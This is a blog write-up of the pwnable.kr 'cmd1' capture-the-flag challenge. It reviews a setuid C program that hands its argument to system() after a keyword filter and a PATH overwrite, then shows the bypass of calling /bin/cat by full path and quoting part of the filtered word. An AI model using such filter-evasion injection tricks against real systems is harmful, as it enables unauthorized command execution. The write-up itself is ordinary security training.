---
layout:     post
title:      "Pwnable.kr - cmd1"
date:       2018-03-10 0:00:00
author:     "W3ndige"
permalink: /:title/
category: 'Pwnable'
---

Welcome to the next challenge called ***cmd1*** from [pwnable.kr](http://pwnable.kr "pwnable.kr").

{% highlight text %}
Mommy! what is PATH environment in Linux?
{% endhighlight %}

### Solution

Firstly, as usual, we're going to log into the provided ssh server.

{% highlight bash %}
main:~ > ssh cmd1@pwnable.kr -p2222
cmd1@pwnable.krs password:
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    /
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|

- Site admin : daehee87.kr@gmail.com
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
Last login: Sat Mar 10 07:15:51 2018 from 87.180.119.209
cmd1@ubuntu:~$ ls -la
total 40
drwxr-x---  5 root cmd1     4096 Oct 23  2016 .
drwxr-xr-x 87 root root     4096 Dec 27 23:17 ..
d---------  2 root root     4096 Jul 12  2015 .bash_history
-r-xr-sr-x  1 root cmd1_pwn 8513 Jul 14  2015 cmd1
-rw-r--r--  1 root root      319 Jul 14  2015 cmd1.c
-r--r-----  1 root cmd1_pwn   48 Jul 14  2015 flag
dr-xr-xr-x  2 root root     4096 Jul 21  2015 .irssi
drwxr-xr-x  2 root root     4096 Oct 23  2016 .pwntools-cache
{% endhighlight %}

Now we're ready to view the source code of the provided challenge files.

{% highlight c %}
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "flag")!=0;
	r += strstr(cmd, "sh")!=0;
	r += strstr(cmd, "tmp")!=0;
	return r;
}
int main(int argc, char* argv[], char** envp){
	putenv("PATH=/fuckyouverymuch");
	if(filter(argv[1])) return 0;
	system( argv[1] );
	return 0;
}
{% endhighlight %}

First thing that is ready to exploit is that if we provide correct argument, program will put it to the `system()` function that will run the code. But the first obstacle is that the input is being filtered through the `filter()` function that will stop execution if the passed argument contains words like `flag`, `sh` or `tmp`.

So we need to enter something along the lines of `cat flag`, but that of course will not execute. But finding that running only `cat` program fails, made me think more about the `putenv()` function.

{% highlight bash %}
cmd1@ubuntu:~$ ./cmd1 "cat fla"
sh: 1: cat: not found
{% endhighlight %}

If we view the PATH environment variables, we can see that the list contains all directories where the binaries are located.

{% highlight bash %}
cmd1@ubuntu:~$ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
{% endhighlight %}

So the program overwriting this, will force us to enter the whole path of `cat` binary.

{% highlight bash %}
cmd1@ubuntu:~$ ./cmd1 "/bin/cat fla"
/bin/cat: fla: No such file or directory
{% endhighlight %}

One thing solved. Now we have to somehow obfuscate the `flag` word in a way that filter will not catch.

{% highlight bash %}
cmd1@ubuntu:~$ ./cmd1 "/bin/cat 'f'lag"
mommy now I get what PATH environment is for :)
{% endhighlight %}

Luckily, this simple quotation trick makes this challenge marked as solved.
